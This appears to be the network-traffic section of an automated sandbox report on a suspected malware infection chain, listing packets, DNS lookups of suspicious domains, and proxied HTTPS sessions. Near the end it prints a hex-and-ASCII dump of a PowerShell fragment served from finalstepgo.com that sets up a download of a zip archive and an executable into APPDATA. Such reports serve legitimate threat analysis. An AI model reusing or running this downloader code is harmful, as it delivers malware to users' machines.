Sep 26, 2024 17:41:29.293445110 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.293530941 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.294020891 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:29.294054985 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.332875013 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.332964897 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.332976103 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.333115101 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.333195925 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.333220005 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:30.887073040 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:30.887124062 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:30.887216091 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:30.887609959 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:30.887624979 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:31.691813946 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:31.691937923 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:31.693875074 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:31.693897963 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:31.694163084 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:31.695801020 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:31.743406057 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.199820995 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.199846983 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.199862003 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.199954987 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.199984074 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.200042009 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.201173067 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.201216936 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.201241970 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.201250076 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.201273918 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.201294899 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.201328039 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.202724934 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.202738047 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:32.202752113 CEST	49731	443	192.168.2.17	4.175.87.197
Sep 26, 2024 17:41:32.202758074 CEST	443	49731	4.175.87.197	192.168.2.17
Sep 26, 2024 17:41:38.722521067 CEST	49691	443	192.168.2.17	204.79.197.200
Sep 26, 2024 17:41:38.939805984 CEST	443	49691	204.79.197.200	192.168.2.17
Sep 26, 2024 17:41:38.939881086 CEST	49691	443	192.168.2.17	204.79.197.200
Sep 26, 2024 17:41:38.974761963 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:38.974797964 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:38.974874973 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:38.975187063 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:38.975200891 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:39.851820946 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:39.851871014 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:39.851943970 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:39.899993896 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:39.900021076 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:39.971698999 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:39.971810102 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:39.987325907 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:39.987345934 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:39.988296986 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:39.988814116 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:39.988852024 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:39.988873005 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.171751976 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.171775103 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.171813011 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.171854973 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:40.171871901 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.171932936 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:40.172179937 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:40.172204018 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:40.172348022 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.172391891 CEST	443	49732	40.126.29.10	192.168.2.17
Sep 26, 2024 17:41:40.172540903 CEST	49732	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:41:40.219031096 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.219126940 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:40.219223976 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.221231937 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.221268892 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:40.459460020 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:40.459544897 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:40.463148117 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:40.463159084 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:40.463464022 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:40.503005028 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:40.547403097 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:40.599256992 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:40.599518061 CEST	443	49733	13.107.5.88	192.168.2.17
Sep 26, 2024 17:41:40.599656105 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:40.602771044 CEST	49733	443	192.168.2.17	13.107.5.88
Sep 26, 2024 17:41:40.879991055 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:40.880076885 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.933572054 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.933589935 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:40.933964968 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:40.934034109 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.936194897 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:40.936228991 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.210263968 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.210311890 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.210351944 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.210372925 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.210386992 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.210426092 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.210630894 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.210684061 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.210685968 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.210725069 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.213016033 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.213037968 CEST	443	49734	2.23.209.181	192.168.2.17
Sep 26, 2024 17:41:41.213052034 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:41.213089943 CEST	49734	443	192.168.2.17	2.23.209.181
Sep 26, 2024 17:41:48.493514061 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:48.493570089 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:48.493665934 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:48.493942022 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:48.493957043 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:49.150506973 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:49.150830984 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:49.150855064 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:49.151963949 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:49.152280092 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:49.152451992 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:49.194289923 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:59.056612015 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:59.056704998 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:41:59.056780100 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:59.966332912 CEST	49736	443	192.168.2.17	142.250.185.132
Sep 26, 2024 17:41:59.966372013 CEST	443	49736	142.250.185.132	192.168.2.17
Sep 26, 2024 17:42:08.689790964 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:08.689841986 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:08.689982891 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:08.691214085 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:08.691224098 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.149061918 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.149184942 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.153409958 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.153418064 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.153656960 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.196443081 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.207289934 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.207289934 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.207413912 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.309511900 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.309556961 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.309587002 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.309604883 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.309664965 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.309684038 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.309731007 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.309752941 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.310971975 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.310992956 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.311026096 CEST	49738	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.311032057 CEST	443	49738	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.396511078 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.396542072 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.396636963 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.396950960 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.396965027 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.787854910 CEST	49721	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:42:09.787884951 CEST	443	49721	185.255.122.133	192.168.2.17
Sep 26, 2024 17:42:09.882122040 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.882536888 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.883619070 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.883627892 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.883841038 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:09.885627985 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.885679960 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:09.885694027 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:10.381728888 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:10.381810904 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:10.382049084 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:10.382230997 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:10.382230997 CEST	49739	443	192.168.2.17	172.67.206.221
Sep 26, 2024 17:42:10.382241964 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:10.382250071 CEST	443	49739	172.67.206.221	192.168.2.17
Sep 26, 2024 17:42:11.511239052 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:11.511282921 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:11.511445999 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:11.511619091 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:11.511634111 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.186093092 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.186813116 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.186827898 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.189819098 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.189827919 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.189863920 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.189872026 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382462978 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382483006 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382606030 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.382613897 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382625103 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382699966 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.382704973 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382714033 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382761002 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.382890940 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.382910967 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:12.382920980 CEST	49740	443	192.168.2.17	40.126.29.10
Sep 26, 2024 17:42:12.382925987 CEST	443	49740	40.126.29.10	192.168.2.17
Sep 26, 2024 17:42:25.965512991 CEST	49721	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:42:25.965647936 CEST	443	49721	185.255.122.133	192.168.2.17
Sep 26, 2024 17:42:25.965734005 CEST	49721	443	192.168.2.17	185.255.122.133

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 17:40:43.655066013 CEST	53	50372	1.1.1.1	192.168.2.17
Sep 26, 2024 17:40:43.694852114 CEST	53	50182	1.1.1.1	192.168.2.17
Sep 26, 2024 17:40:44.784579039 CEST	53	64681	1.1.1.1	192.168.2.17
Sep 26, 2024 17:40:44.867613077 CEST	54470	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:40:44.868165016 CEST	50785	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:40:44.894392967 CEST	53	50785	1.1.1.1	192.168.2.17
Sep 26, 2024 17:40:44.917853117 CEST	53	54470	1.1.1.1	192.168.2.17
Sep 26, 2024 17:40:48.441917896 CEST	54287	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:40:48.442102909 CEST	55525	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:40:48.449589014 CEST	53	55525	1.1.1.1	192.168.2.17
Sep 26, 2024 17:40:48.449677944 CEST	53	54287	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:01.746273994 CEST	53	56345	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:20.644454002 CEST	53	62237	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:25.509120941 CEST	58778	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:41:25.509258986 CEST	49429	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:41:25.513926983 CEST	53	61973	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:25.515748024 CEST	53	58778	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:25.517703056 CEST	53	49429	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:26.512590885 CEST	57090	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:41:26.512744904 CEST	57579	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:41:26.519769907 CEST	53	57579	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:26.519921064 CEST	53	57090	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:43.611346960 CEST	53	60377	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:43.674185991 CEST	53	54232	1.1.1.1	192.168.2.17
Sep 26, 2024 17:41:56.984848976 CEST	138	138	192.168.2.17	192.168.2.255
Sep 26, 2024 17:42:08.651587009 CEST	63060	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:42:08.663491964 CEST	53	63060	1.1.1.1	192.168.2.17
Sep 26, 2024 17:42:08.667320967 CEST	54889	53	192.168.2.17	1.1.1.1
Sep 26, 2024 17:42:08.683542013 CEST	53	54889	1.1.1.1	192.168.2.17
Sep 26, 2024 17:42:11.295989990 CEST	53	62390	1.1.1.1	192.168.2.17

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 17:40:44.867613077 CEST	192.168.2.17	1.1.1.1	0x36ee	Standard query (0)	finalstepgo.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:40:44.868165016 CEST	192.168.2.17	1.1.1.1	0x885a	Standard query (0)	finalstepgo.com	65	IN (0x0001)	false
Sep 26, 2024 17:40:48.441917896 CEST	192.168.2.17	1.1.1.1	0xb763	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:40:48.442102909 CEST	192.168.2.17	1.1.1.1	0xcfa9	Standard query (0)	www.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:41:25.509120941 CEST	192.168.2.17	1.1.1.1	0xb515	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:41:25.509258986 CEST	192.168.2.17	1.1.1.1	0x5d6d	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:41:26.512590885 CEST	192.168.2.17	1.1.1.1	0x7af7	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:41:26.512744904 CEST	192.168.2.17	1.1.1.1	0x5ab3	Standard query (0)	play.google.com	65	IN (0x0001)	false
Sep 26, 2024 17:42:08.651587009 CEST	192.168.2.17	1.1.1.1	0xb8e8	Standard query (0)	candleduseiwo.shop	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:42:08.667320967 CEST	192.168.2.17	1.1.1.1	0xcdae	Standard query (0)	racedsuitreow.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 17:40:44.917853117 CEST	1.1.1.1	192.168.2.17	0x36ee	No error (0)	finalstepgo.com		185.255.122.133	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:40:48.449589014 CEST	1.1.1.1	192.168.2.17	0xcfa9	No error (0)	www.google.com			65	IN (0x0001)	false
Sep 26, 2024 17:40:48.449677944 CEST	1.1.1.1	192.168.2.17	0xb763	No error (0)	www.google.com		142.250.185.132	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:41:25.515748024 CEST	1.1.1.1	192.168.2.17	0xb515	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:41:25.515748024 CEST	1.1.1.1	192.168.2.17	0xb515	No error (0)	plus.l.google.com		142.250.184.238	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:41:25.517703056 CEST	1.1.1.1	192.168.2.17	0x5d6d	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 26, 2024 17:41:26.519921064 CEST	1.1.1.1	192.168.2.17	0x7af7	No error (0)	play.google.com		142.250.186.110	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:42:08.663491964 CEST	1.1.1.1	192.168.2.17	0xb8e8	Name error (3)	candleduseiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:42:08.683542013 CEST	1.1.1.1	192.168.2.17	0xcdae	No error (0)	racedsuitreow.shop		172.67.206.221	A (IP address)	IN (0x0001)	false
Sep 26, 2024 17:42:08.683542013 CEST	1.1.1.1	192.168.2.17	0xcdae	No error (0)	racedsuitreow.shop		104.21.37.97	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

finalstepgo.com

https:

slscr.update.microsoft.com

fs.microsoft.com

www.google.com

apis.google.com

play.google.com

evoke-windowsservices-tas.msedge.net

www.bing.com

racedsuitreow.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.17	49706	185.255.122.133	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:40:45 UTC	673	OUT	GET /uploads/il2.txt HTTP/1.1 Host: finalstepgo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:40:46 UTC	206	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:40:38 GMT Server: Apache Last-Modified: Thu, 26 Sep 2024 14:09:48 GMT Accept-Ranges: bytes Content-Length: 563 Connection: close Content-Type: text/plain
2024-09-26 15:40:46 UTC	563	IN	Data Raw: 24 44 43 39 6f 74 6a 30 56 3d 27 68 74 74 70 73 3a 2f 2f 66 69 6e 61 6c 73 74 65 70 67 6f 2e 63 6f 6d 2f 75 70 6c 6f 61 64 73 2f 69 6c 32 32 32 2e 7a 69 70 27 3b 20 24 4f 6f 39 49 47 46 72 58 3d 24 65 6e 76 3a 41 50 50 44 41 54 41 2b 27 5c 4f 49 6c 71 4a 59 75 45 27 3b 20 24 6a 52 41 59 6e 57 4f 53 3d 24 65 6e 76 3a 41 50 50 44 41 54 41 2b 27 5c 79 41 4e 72 64 4e 4b 54 2e 7a 69 70 27 3b 20 24 42 74 64 53 47 66 63 69 3d 24 4f 6f 39 49 47 46 72 58 2b 27 5c 50 72 69 76 61 63 79 44 72 69 76 65 2e 65 78 65 27 3b 20 69 66 20 28 2d 6e 6f 74 20 28 74 65 53 54 2d 50 61 74 48 20 24 4f 6f 39 49 47 46 72 58 29 29 20 7b 20 6e 65 77 2d 69 74 45 4d 20 2d 50 61 74 68 20 24 4f 6f 39 49 47 46 72 58 20 2d 49 74 65 6d 54 79 70 65 20 44 69 72 65 63 74 6f 72 79 20 7d 3b 20 53 Data Ascii: $DC9otj0V='https://finalstepgo.com/uploads/il222.zip'; $Oo9IGFrX=$env:APPDATA+'\OIlqJYuE'; $jRAYnWOS=$env:APPDATA+'\yANrdNKT.zip'; $BtdSGfci=$Oo9IGFrX+'\PrivacyDrive.exe'; if (-not (teST-PatH $Oo9IGFrX)) { new-itEM -Path $Oo9IGFrX -ItemType Directory }; S

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.17	49707	185.255.122.133	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:40:46 UTC	601	OUT	GET /favicon.ico HTTP/1.1 Host: finalstepgo.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://finalstepgo.com/uploads/il2.txt Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-09-26 15:40:46 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 26 Sep 2024 15:40:39 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-09-26 15:40:46 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data 